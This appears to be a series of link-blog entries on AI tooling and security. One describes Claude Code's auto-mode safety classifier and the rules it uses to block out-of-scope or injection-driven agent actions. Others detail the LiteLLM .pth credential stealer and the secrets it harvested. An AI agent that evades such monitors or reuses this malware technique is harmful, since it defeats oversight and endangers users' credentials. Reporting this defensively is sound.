| We Rewrote JSONata with AI in a Day, Saved $500K/Year |
https://www.reco.ai/blog/we-rewrote-jsonata-with-ai |
Bit of a hyperbolic framing but this looks like another case study of **vibe porting**, this time spinning up a new custom Go implementation of the [JSONata](https://jsonata.org) JSON expression language - similar in focus to jq, and heavily associated with the [Node-RED](https://nodered.org) platform.
As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend.
The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one. |
2026-03-27 00:35:01+00:00 |
| My minute-by-minute response to the LiteLLM malware attack |
https://futuresearch.ai/blog/litellm-attack-transcript/ |
Callum McMahon reported the [LiteLLM malware attack](https://simonwillison.net/2026/Mar/24/malicious-litellm/) to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:
> **Confirmed**. Fresh download from PyPI right now in an isolated Docker container:
>
> Inspecting: litellm-1.82.8-py3-none-any.whl
> FOUND: litellm_init.pth
> SIZE: 34628 bytes
> FIRST 200 CHARS:
> import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
>
> The malicious `litellm==1.82.8` is **live on PyPI right now** and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.
I was chuffed to see Callum use my [claude-code-transcripts](https://github.com/simonw/claude-code-transcripts) tool to publish the transcript of the conversation. |
2026-03-26 23:58:22+00:00 |
| Quantization from the ground up |
https://ngrok.com/blog/quantization |
Sam Rose continues [his streak](https://simonwillison.net/tags/sam-rose/) of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "[the best post I've ever made](https://twitter.com/samwhoo/status/2036845101561835968)".)
Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits.

I hadn't heard about **outlier values** in quantization - rare float values that exist outside of the normal tiny-value distribution - but apparently they're very important:
> Why do these outliers exist? [...] tl;dr: no one conclusively knows, but a small fraction of these outliers are *very* important to model quality. Removing even a *single* "super weight," as Apple calls them, can cause the model to output complete gibberish.
>
> Given their importance, real-world quantization schemes sometimes do extra work to preserve these outliers. They might do this by not quantizing them at all, or by saving their location and value into a separate table, then removing them so that their block isn't destroyed.
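That outlier-preservation trick is easy to sketch. The scheme below is my own simplification (the threshold, the 4-bit level count, and the side-table layout are all invented for illustration): values past a threshold are stored exactly in a separate table, and everything else is absmax-quantized per block.

```python
# Toy block quantization with outlier extraction. Not the scheme from the
# post - a simplified sketch: outliers go into an exact side table so they
# don't blow up the block's quantization scale.
def quantize_block(values, threshold=10.0, levels=15):
    outliers = {i: v for i, v in enumerate(values) if abs(v) > threshold}
    rest = [0.0 if i in outliers else v for i, v in enumerate(values)]
    scale = max(abs(v) for v in rest) / levels or 1.0  # absmax scaling
    quants = [round(v / scale) for v in rest]          # ~4-bit integers
    return quants, scale, outliers

def dequantize_block(quants, scale, outliers):
    # outliers come back exactly; everything else is approximate
    return [outliers.get(i, q * scale) for i, q in enumerate(quants)]

block = [0.1, -0.4, 120.0, 0.3, -0.2, 0.05]  # 120.0 is the outlier
q, s, out = quantize_block(block)
restored = dequantize_block(q, s, out)
print(restored)
```

Without the side table, that single 120.0 would force the block's scale to 8.0 and flatten every small value to zero - which is exactly the "block destroyed" problem Sam describes.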
Plus there's a section on [How much does quantization affect model accuracy?](https://ngrok.com/blog/quantization#how-much-does-quantization-affect-model-accuracy). Sam explains the concepts of **perplexity** and **KL divergence** and then uses the [llama.cpp perplexity tool](https://github.com/ggml-org/llama.cpp/tree/master/tools/perplexity) and a run of the GPQA benchmark to show how different quantization levels affect Qwen 3.5 9B.
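For intuition: perplexity is the exponential of the average negative log-probability the model assigns to each token, and KL divergence measures how far the quantized model's token distribution drifts from the original's. A minimal illustration with made-up probabilities:

```python
import math

# Perplexity from per-token probabilities (numbers invented for the example)
token_probs = [0.5, 0.25, 0.8, 0.1]
nll = -sum(math.log(p) for p in token_probs) / len(token_probs)
perplexity = math.exp(nll)  # lower is better; 1.0 would be a perfect model

# KL divergence between the original model's next-token distribution (p)
# and the quantized model's (q) over a 3-token vocabulary
p = [0.7, 0.2, 0.1]
q = [0.6, 0.25, 0.15]
kl = sum(pi * math.log(pi / qi) for pi, qi in zip(p, q))  # 0 means identical

print(round(perplexity, 3), round(kl, 4))
```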
His conclusion:
> It looks like 16-bit to 8-bit carries almost no quality penalty. 16-bit to 4-bit is more noticeable, but it's certainly not a quarter as good as the original. Closer to 90%, depending on how you want to measure it. |
2026-03-26 16:21:09+00:00 |
| Thoughts on slowing the fuck down |
https://news.ycombinator.com/item?id=47517539 |
Mario Zechner created the [Pi agent framework](https://github.com/badlogic/pi-mono) used by OpenClaw, giving considerable credibility to his opinions on current trends in agentic engineering. He's not impressed:
> We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned.
Agents and humans both make mistakes, but agent mistakes accumulate much faster:
> A human is a bottleneck. A human cannot shit out 20,000 lines of code in a few hours. Even if the human creates such booboos at high frequency, there's only so many booboos the human can introduce in a codebase per day. [...]
>
> With an orchestrated army of agents, there is no bottleneck, no human pain. These tiny little harmless booboos suddenly compound at a rate that's unsustainable. You have removed yourself from the loop, so you don't even know that all the innocent booboos have formed a monster of a codebase. You only feel the pain when it's too late. [...]
>
> You have zero fucking idea what's going on because you delegated all your agency to your agents. You let them run free, and they are merchants of complexity.
I think Mario is exactly right about this. Agents let us move *so much faster*, but this speed also means that changes which we would normally have considered over the course of weeks are landing in a matter of hours.
It's so easy to let the codebase evolve outside of our abilities to reason clearly about it. [Cognitive debt](https://simonwillison.net/tags/cognitive-debt/) is real.
Mario recommends slowing down:
> Give yourself time to think about what you're actually building and why. Give yourself an opportunity to say, fuck no, we don't need this. Set yourself limits on how much code you let the clanker generate per day, in line with your ability to actually review the code.
>
> Anything that defines the gestalt of your system, that is architecture, API, and so on, write it by hand. [...]
I'm not convinced writing by hand is the best way to address this, but it's absolutely the case that we need the discipline to find a new balance of speed vs. mental thoroughness now that typing out the code is no longer anywhere close to being the bottleneck on writing software. |
2026-03-25 21:47:17+00:00 |
| LiteLLM Hack: Were You One of the 47,000? |
https://futuresearch.ai/blog/litellm-hack-were-you-one-of-the-47000/ |
Daniel Hnyk used the [BigQuery PyPI dataset](https://console.cloud.google.com/bigquery?p=bigquery-public-data&d=pypi) to determine how many downloads there were of [the exploited LiteLLM packages](https://simonwillison.net/2026/Mar/24/malicious-litellm/) during the 46-minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8).
They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited version. |
2026-03-25 17:21:04+00:00 |
| Auto mode for Claude Code |
https://claude.com/blog/auto-mode |
Really interesting new development in Claude Code today as an alternative to `--dangerously-skip-permissions`:
> Today, we're introducing auto mode, a new permissions mode in Claude Code where Claude makes permission decisions on your behalf, with safeguards monitoring actions before they run.
Those safeguards appear to be implemented using Claude Sonnet 4.6, as [described in the documentation](https://code.claude.com/docs/en/permission-modes#eliminate-prompts-with-auto-mode):
> Before each action runs, a separate classifier model reviews the conversation and decides whether the action matches what you asked for: it blocks actions that escalate beyond the task scope, target infrastructure the classifier doesn’t recognize as trusted, or appear to be driven by hostile content encountered in a file or web page. [...]
>
> **Model**: the classifier runs on Claude Sonnet 4.6, even if your main session uses a different model.
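The overall shape of that gate is easy to sketch. This is my own simplified version of the pattern, not Anthropic's implementation - the `classify()` function here stands in for the call to the Sonnet classifier, using crude keyword rules purely so the sketch runs:

```python
# Simplified sketch of a permission-gating classifier in front of an
# agent's tool calls. The real thing sends the conversation plus the
# proposed action to a separate model; this stub fakes that decision.
def classify(conversation, action):
    # stand-in for the classifier model call (keyword rules for the demo)
    if "curl | bash" in action or "--force" in action:
        return "soft_deny"   # destructive / external-code patterns
    if action.startswith(("cat ", "ls ", "git status")):
        return "allow"       # read-only operations
    return "block"           # default: don't run what we can't classify

def gated_run(conversation, action):
    verdict = classify(conversation, action)
    if verdict == "allow":
        return f"ran: {action}"
    return f"{verdict}: {action}"  # surfaced to the user instead of running

print(gated_run([], "git status"))
print(gated_run([], "git push --force origin main"))
```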
They ship with an extensive set of default filters, and you can also customize them further with your own rules. The most interesting insight into how they work comes when you run this new command in the terminal:
    claude auto-mode defaults
[Here's the full JSON output](https://gist.githubusercontent.com/simonw/91863bfd9f7ebf916d1fabb8e6940335/raw/cda3c88e919b8238e85d3f1cc990e8ff48ad9a18/defaults.json). It's pretty long, so here's an illustrative subset:
From the "allow" list:
> - Test Artifacts: Hardcoded test API keys, placeholder credentials in examples, or hardcoding test cases
> - Local Operations: Agent deleting local files in working directory, local file operations within project scope, or using `--ignore-certificate-errors` for local testing. "Project scope" means the repository the session started in — wandering into ~/, ~/Library/, /etc, or other repos is scope escalation (User Intent Rule #2), not a local operation. Does NOT cover irreversible destruction of pre-existing files or local stateful services — see "Irreversible Local Destruction" in BLOCK.
> - Read-Only Operations: GET requests, read-only API calls, or queries that don't modify state and don't contain sensitive information in the URL. Note: PREEMPTIVE BLOCK ON CLEAR INTENT still applies — if the transcript contains clear evidence the agent is using read-only operations to scout for a blocked action, block it.
> - Declared Dependencies: Installing packages that are already declared in the repo's manifest files (requirements.txt, package.json, Cargo.toml, pyproject.toml, Gemfile, etc.) via standard commands that read those manifests (`pip install -r requirements.txt`, `npm install`, `cargo build`, `bundle install`) — provided the agent has not modified the manifest in this session. Does NOT cover installing agent-chosen package names (e.g. `pip install foo`, `npm install bar`) — those carry typosquat and supply-chain risk. [...]
From "soft_deny":
> - Git Destructive: Force pushing (`git push --force`), deleting remote branches, or rewriting remote history
> - Git Push to Default Branch: Pushing directly to main, master, or the repository's default branch — this bypasses pull request review. Commits should be pushed to a new feature branch instead.
> - Code from External: Downloading and executing code from external sources — e.g. `curl | bash`, deserializing external data via formats that can execute code (eval, exec, yaml.unsafe_load, pickle, etc), or similar mechanisms. Also includes running code from an external repo cloned earlier in the transcript (pip install -e, make install, python script.py, pickle.load/torch.load on cloned repo files) — "local on disk" does not mean trusted if it was cloned from an external source visible in the transcript. The repo the agent starts in is trusted.
> - Cloud Storage Mass Delete: Deleting or mass modifying files on cloud storage (S3, GCS, Azure Blob, etc.) [...]
I remain unconvinced by prompt injection protections that rely on AI, since they're non-deterministic by nature. The documentation does warn that this may still let things through:
> The classifier may still allow some risky actions: for example, if user intent is ambiguous, or if Claude doesn't have enough context about your environment to know an action might create additional risk.
The fact that the default allow list includes `pip install -r requirements.txt` also means that this wouldn't protect against supply chain attacks with unpinned dependencies, as seen this morning [with LiteLLM](https://simonwillison.net/2026/Mar/24/malicious-litellm/).
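To see why pinning matters here: an exact pin excludes the compromised releases entirely, while a floating constraint resolves to whatever is newest on the index at install time. A toy comparison (naive dotted-version parsing, not full PEP 440 resolution):

```python
# Sketch of why unpinned specifiers pulled in the malicious release.
def version_tuple(v):
    return tuple(int(x) for x in v.split("."))

compromised = ["1.82.7", "1.82.8"]  # the two exploited releases
safe_pin = "1.82.6"                 # a hypothetical pinned version

# An exact pin (litellm==1.82.6) never matches the compromised releases:
pin_matches_bad = any(v == safe_pin for v in compromised)

# A floating constraint (litellm>=1.82) resolves to the newest available
# version - which during the attack window was the malicious 1.82.8:
newest = max(compromised + [safe_pin], key=version_tuple)

print(pin_matches_bad, newest)
```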
I still want my coding agents to run in a robust sandbox by default, one that restricts file access and network connections in a deterministic way. I trust those a whole lot more than prompt-based protections like this new auto mode. |
2026-03-24 23:57:33+00:00 |
| Package Managers Need to Cool Down |
https://nesbitt.io/2026/03/04/package-managers-need-to-cool-down.html |
Today's [LiteLLM supply chain attack](https://simonwillison.net/2026/Mar/24/malicious-litellm/) inspired me to revisit the idea of [dependency cooldowns](https://simonwillison.net/2025/Nov/21/dependency-cooldowns/), the practice of only installing updated dependencies once they've been out in the wild for a few days to give the community a chance to spot if they've been subverted in some way.
This recent (March 4th) piece by Andrew Nesbitt reviews the current state of dependency cooldown mechanisms across different packaging tools. It's surprisingly well supported! There's been a flurry of activity across major packaging tools, including:
- [pnpm 10.16](https://pnpm.io/blog/releases/10.16#new-setting-for-delayed-dependency-updates) (September 2025) — `minimumReleaseAge` with `minimumReleaseAgeExclude` for trusted packages
- [Yarn 4.10.0](https://github.com/yarnpkg/berry/releases/tag/%40yarnpkg%2Fcli%2F4.10.0) (September 2025) — `npmMinimalAgeGate` (in minutes) with `npmPreapprovedPackages` for exemptions
- [Bun 1.3](https://bun.com/blog/bun-v1.3#minimum-release-age) (October 2025) — `minimumReleaseAge` via `bunfig.toml`
- [Deno 2.6](https://deno.com/blog/v2.6#controlling-dependency-stability) (December 2025) — `--minimum-dependency-age` for `deno update` and `deno outdated`
- [uv 0.9.17](https://github.com/astral-sh/uv/releases/tag/0.9.17) (December 2025) — added relative duration support to existing `--exclude-newer`, plus per-package overrides via `exclude-newer-package`
- [pip 26.0](https://ichard26.github.io/blog/2026/01/whats-new-in-pip-26.0/) (January 2026) — `--uploaded-prior-to` (absolute timestamps only; [relative duration support requested](https://github.com/pypa/pip/issues/13674))
- [npm 11.10.0](https://socket.dev/blog/npm-introduces-minimumreleaseage-and-bulk-oidc-configuration) (February 2026) — `min-release-age`
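Since pip's option only takes an absolute timestamp, a relative cooldown has to be emulated by recomputing the cutoff on a schedule. A minimal sketch of that recomputation (the five-day window is arbitrary, and I'm assuming the config key mirrors the `--uploaded-prior-to` flag name - check pip's docs before relying on it):

```python
# Recompute an absolute "uploaded prior to" cutoff from a relative
# cooldown window - the kind of line a daily cron job could write into
# pip.conf to emulate relative cooldowns.
from datetime import datetime, timedelta, timezone

COOLDOWN_DAYS = 5  # hypothetical cooldown window
cutoff = datetime.now(timezone.utc) - timedelta(days=COOLDOWN_DAYS)
line = f"uploaded-prior-to = {cutoff:%Y-%m-%dT%H:%M:%SZ}"
print(line)
```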
`pip` currently only supports absolute rather than relative dates but Seth Larson [has a workaround for that](https://sethmlarson.dev/pip-relative-dependency-cooling-with-crontab) using a scheduled cron to update the absolute date in the `pip.conf` config file. |
2026-03-24 21:11:38+00:00 |
| Malicious litellm_init.pth in litellm 1.82.8 — credential stealer |
https://github.com/BerriAI/litellm/issues/24512 |
The LiteLLM v1.82.8 package published to PyPI was compromised with a particularly nasty credential stealer hidden in base64 in a `litellm_init.pth` file, which means installing the package is enough to trigger it even without running `import litellm`.
(1.82.7 had the exploit as well but it was in the `proxy/proxy_server.py` file so the package had to be imported for it to take effect.)
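The `.pth` trick works because Python's `site` module, which runs at interpreter startup, executes any line in a `.pth` file that begins with `import`. Here's a harmless demonstration using `site.addsitedir()`, which exercises the same code path:

```python
import os
import site
import tempfile

# Write a .pth file whose "import" line has a visible side effect.
# At startup the site module does exactly this for every .pth file in
# site-packages - which is how litellm_init.pth ran its payload without
# anyone ever typing "import litellm".
d = tempfile.mkdtemp()
with open(os.path.join(d, "demo_init.pth"), "w") as f:
    f.write("import os; os.environ['PTH_RAN'] = '1'\n")

site.addsitedir(d)  # processes .pth files like interpreter startup does
print(os.environ.get("PTH_RAN"))  # → 1
```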
This issue has a very detailed description of what the credential stealer does. There's more information about the timeline of the exploit [over here](https://github.com/BerriAI/litellm/issues/24518).
PyPI has already [quarantined](https://pypi.org/help/#project_in_quarantine) the [litellm package](https://pypi.org/project/litellm/) so the window for compromise was just a few hours, but if you DID install the package it would have hoovered up a bewildering array of secrets, including `~/.ssh/`, `~/.gitconfig`, `~/.git-credentials`, `~/.aws/`, `~/.kube/`, `~/.config/`, `~/.azure/`, `~/.docker/`, `~/.npmrc`, `~/.vault-token`, `~/.netrc`, `~/.lftprc`, `~/.msmtprc`, `~/.my.cnf`, `~/.pgpass`, `~/.mongorc.js`, `~/.bash_history`, `~/.zsh_history`, `~/.sh_history`, `~/.mysql_history`, `~/.psql_history`, `~/.rediscli_history`, `~/.bitcoin/`, `~/.litecoin/`, `~/.dogecoin/`, `~/.zcash/`, `~/.dashcore/`, `~/.ripple/`, `~/.bitmonero/`, `~/.ethereum/`, `~/.cardano/`.
It looks like this supply chain attack started with the [recent exploit](https://www.crowdstrike.com/en-us/blog/from-scanner-to-stealer-inside-the-trivy-action-supply-chain-compromise/) against [Trivy](https://trivy.dev/), ironically a security scanner tool that was used in CI [by LiteLLM](https://github.com/BerriAI/litellm/blob/9343aeefca37aa49a6ea54397d7615adae5c72c9/ci_cd/security_scans.sh#L16). The Trivy exploit likely resulted in stolen PyPI credentials which were then used to directly publish the vulnerable packages. |
2026-03-24 15:07:31+00:00 |
| Turbo Pascal 3.02A, deconstructed |
https://tools.simonwillison.net/turbo-pascal-deconstructed |
In [Things That Turbo Pascal is Smaller Than](https://prog21.dadgum.com/116.html) James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler.
This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me.
It did a great job, so I had it create [this interactive artifact](https://tools.simonwillison.net/turbo-pascal-deconstructed) illustrating the result. Here's the [sequence of prompts](https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e) I used (in regular [claude.ai](https://claude.ai/) chat, not Claude Code):
> Read this https://prog21.dadgum.com/116.html
> Now find a copy of that binary online
> Explore this (*I attached the zip file*)
> Build an artifact - no react - that embeds the full turbo.com binary and displays it in a way that helps understand it - broke into labeled segments for different parts of the application, decompiled to visible source code (I guess assembly?) and with that assembly then reconstructed into readable code with extensive annotations

**Update**: Annoyingly the [Claude share link](https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e) doesn't show the actual code that Claude executed, but here's [the zip file](https://static.simonwillison.net/static/2026/turbo-pascal-analysis.zip) it gave me when I asked to download all of the intermediate files.
I ran Codex CLI with GPT-5.4 xhigh against that zip file to see if it would spot any obvious hallucinations, and it did not. This project is low-enough stakes that this gave me enough confidence to publish the result!
<h4 id="hallucinated-slop">Turns out it's hallucinated slop</h4>
**Update 2**, 24th March 2026: rep_lodsb on Hacker News is someone who actually understands assembler, and they reviewed the annotations and [found them to be hallucinated slop](https://news.ycombinator.com/item?id=47471647#47501692):
> [...] Obviously, there has to be a lot more to even a simple-minded x86 code generator than just a generic "emit opcode byte" and "emit call" routine. In general, what A"I" produced here is not a full disassembly but a collection of short snippets, potentially not even including the really interesting ones. But is it even correct?
>
> EmitByte here is unnecessarily pushing/popping AX, which isn't modified by the few instructions in between at all. No competent assembly language programmer would do this. So maybe against all expectations, Turbo Pascal is just really badly coded? No, it's of course a hallucination: those instructions don't appear in the binary at all! [...]
>
> But searching for e.g. the hex opcode B0 E8 ('mov al,0xe8') is enough to confirm that this code snippet isn't to be found *anywhere*.
>
> There is a lot more suspicious code, including some that couldn't possibly work (like the "ret 1" in the system call dispatcher, which would misalign the stack).
>
> Conclusion: it's slop
Because it's amusing to loop this kind of criticism through a model, I [pasted their feedback into Claude](https://claude.ai/share/a64c94eb-c623-4fd4-b101-e3e7d66c77ca) along with instructions to re-review the code, and it agreed with their assessment:
> The commenter's core charge — that the annotated disassembly is "slop" — is substantiated. The artifact presents a mix of genuine analysis (real hex dumps, some correctly disassembled sections) and wholesale fabrication (invented assembly with plausible-sounding labels and comments for roughly half the binary). The fabricated sections look convincing to a casual reader but don't survive byte-level comparison with the actual binary. |
2026-03-20 23:59:14+00:00 |
| Autoresearching Apple's "LLM in a Flash" to run Qwen 397B locally |
https://twitter.com/danveloper/status/2034353876753592372 |
Here's a fascinating piece of research by Dan Woods, who managed to get a custom version of [Qwen3.5-397B-A17B](https://huggingface.co/Qwen/Qwen3.5-397B-A17B/tree/main) running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max despite that model taking up 209GB (120GB quantized) on disk.
Qwen3.5-397B-A17B is a Mixture-of-Experts (MoE) model, which means that each token only needs to run against a subset of the overall model weights. These expert weights can be streamed into memory from SSD, saving them from all needing to be held in RAM at the same time.
Dan used techniques described in Apple's 2023 paper [LLM in a flash: Efficient Large Language Model Inference with Limited Memory](https://arxiv.org/abs/2312.11514):
> This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks.
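The expert-streaming idea can be sketched in a few lines. This is a toy illustration of the pattern, not Dan's code (expert count, cache size, and the load function are all invented): a router picks a handful of experts per token, and only those experts' weights are pulled from disk into a small LRU cache, so the full set never has to be resident in RAM.

```python
# Toy MoE expert streaming with an LRU cache of resident experts.
from collections import OrderedDict

NUM_EXPERTS, CACHE_SLOTS = 8, 3  # hypothetical sizes

def load_expert_from_ssd(i):
    return f"weights-{i}"  # stand-in for an mmap'd read from flash

cache = OrderedDict()  # expert id -> weights, in LRU order

def get_expert(i):
    if i in cache:
        cache.move_to_end(i)           # cache hit: mark most recently used
    else:
        if len(cache) >= CACHE_SLOTS:
            cache.popitem(last=False)  # evict least recently used expert
        cache[i] = load_expert_from_ssd(i)
    return cache[i]

# Simulated router output: which experts each token activates
for token_routing in [(0, 3), (3, 5), (0, 5)]:
    active = [get_expert(i) for i in token_routing]

print(sorted(cache))  # only a few experts resident at any time
```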
He fed the paper to Claude Code and used a variant of Andrej Karpathy's [autoresearch pattern](https://simonwillison.net/2026/Mar/13/liquid/) to have Claude run 90 experiments and produce MLX Objective-C and Metal code that ran the model as efficiently as possible.
[danveloper/flash-moe](https://github.com/danveloper/flash-moe) has the resulting code plus [a PDF paper](https://github.com/danveloper/flash-moe/blob/main/paper/flash_moe.pdf) mostly written by Claude Opus 4.6 describing the experiment in full.
The final model has the experts quantized to 2-bit, but the non-expert parts of the model such as the embedding table and routing matrices are kept at their original precision, adding up to 5.5GB which stays resident in memory while the model is running.
Qwen 3.5 usually runs 10 experts per token, but this setup dropped that to 4 while claiming that the biggest quality drop-off occurred at 3.
It's not clear to me how much the quality of the model's results is affected. Claude claimed that "Output quality at 2-bit is indistinguishable from 4-bit for these evaluations", but the description of the evaluations it ran is quite thin.
**Update**: Dan's [latest version](https://twitter.com/danveloper/status/2034686509748462022) upgrades to 4-bit quantization of the experts (209GB on disk, 4.36 tokens/second) after finding that the 2-bit version broke tool calling while 4-bit handles that well. |
2026-03-18 23:56:46+00:00 |